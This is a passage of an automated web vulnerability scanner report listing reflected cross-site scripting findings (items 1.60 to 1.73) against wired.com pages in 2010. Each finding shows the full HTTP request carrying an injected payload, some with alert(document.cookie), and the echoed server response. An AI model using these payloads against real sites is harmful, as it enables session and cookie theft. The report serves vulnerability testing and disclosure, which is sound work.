Date: Sun, 21 Nov 2010 23:07:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artb9075"><a>792f200a800 c_multimedia">
...[SNIP]...

1.60. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/TKTKTK

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c218"><a>6790c22ef86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia4c218"><a>6790c22ef86/2008/07/TKTKTK HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29290
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:33 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia4c218"><a>6790c22ef86">
...[SNIP]...

1.61. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the <img%20src request parameter is copied into the HTML document as plain text between tags. The payload 14661<script>alert(1)</script>f716d04df3f was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/>"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/></h1>=114661<script>alert(1)</script>f716d04df3f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:23 GMT
Date: Sun, 21 Nov 2010 20:41:23 GMT
Connection: close
Content-Length: 40901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=114661<script>alert(1)</script>f716d04df3f', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.62. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [<img%20src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the <img%20src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca4a"><script>alert(1)</script>649eec63546 was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?<img%20src=2ca4a"><script>alert(1)</script>649eec63546 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:23 GMT
Date: Sun, 21 Nov 2010 20:41:23 GMT
Connection: close
Content-Length: 40635


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img%20src=2ca4a"><script>alert(1)</script>649eec63546', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.63. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d3d"><a>9b77dfd8a23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture74d3d"><a>9b77dfd8a23/art/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:08:35 GMT
Date: Sun, 21 Nov 2010 19:58:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture74d3d"><a>9b77dfd8a23 ss_art c_multimedia">
...[SNIP]...

1.64. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc69"><a>3cda8068985 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art8cc69"><a>3cda8068985/multimedia/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:08:49 GMT
Date: Sun, 21 Nov 2010 19:58:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art8cc69"><a>3cda8068985 c_multimedia">
...[SNIP]...

1.65. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85426"><a>aac868d772e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia85426"><a>aac868d772e/2008/07/gallery_faves_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29302
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 20:09:36 GMT
Date: Sun, 21 Nov 2010 19:59:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia85426"><a>aac868d772e">
...[SNIP]...

1.66. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload 966a2<script>alert(1)</script>976c2c8bf57 was submitted in the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1966a2<script>alert(1)</script>976c2c8bf57 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:33:21 GMT
Date: Sun, 21 Nov 2010 20:23:21 GMT
Connection: close
Content-Length: 40715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1966a2<script>alert(1)</script>976c2c8bf57', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.67. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> request parameter is copied into the HTML document as plain text between tags. The payload 21969<script>alert(1)</script>01760d30d83 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1>=121969<script>alert(1)</script>01760d30d83 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:50:58 GMT
Date: Sun, 21 Nov 2010 20:40:58 GMT
Connection: close
Content-Length: 40738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=121969<script>alert(1)</script>01760d30d83', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.68. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the name of an HTML tag. The payload 6981a><script>alert(1)</script>03dc29fdb27 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src=6981a><script>alert(1)</script>03dc29fdb27 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:00 GMT
Date: Sun, 21 Nov 2010 20:41:00 GMT
Connection: close
Content-Length: 40743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<img%20src=6981a><script>alert(1)</script>03dc29fdb27', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.69. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the HTML document as plain text between tags. The payload d1198<script>alert(1)</script>39b53ac696 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src="http://cloudscan.me/images/xss-man-3.jpg"%20width="160"%20height="120"/></h1>=1d1198<script>alert(1)</script>39b53ac696 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:51:01 GMT
Date: Sun, 21 Nov 2010 20:41:01 GMT
Connection: close
Content-Length: 40821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</h1>=1d1198<script>alert(1)</script>39b53ac696', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.70. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload ea80a<script>alert(1)</script>2ef91889cf7 was submitted in the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1ea80a<script>alert(1)</script>2ef91889cf7 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.wired.com

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:34:05 GMT
Date: Sun, 21 Nov 2010 20:24:05 GMT
Connection: close
Content-Length: 40729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1ea80a<script>alert(1)</script>2ef91889cf7', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.71. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbadd"><script>alert(1)</script>08561a98595 was submitted in the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:34:07 GMT
Date: Sun, 21 Nov 2010 20:24:07 GMT
Connection: close
Content-Length: 40729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.72. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eac"><script>alert(1)</script>7170e64b2e2 was submitted in the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; __utmb=238032518; __utmc=238032518; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_nr=1290369692237; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:35:32 GMT
Date: Sun, 21 Nov 2010 20:25:32 GMT
Connection: close
Content-Length: 40743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
cript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.73. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56a1"><script>alert(1)</script>4b74896c38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:08:35 GMT
Date: Sun, 21 Nov 2010 19:58:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

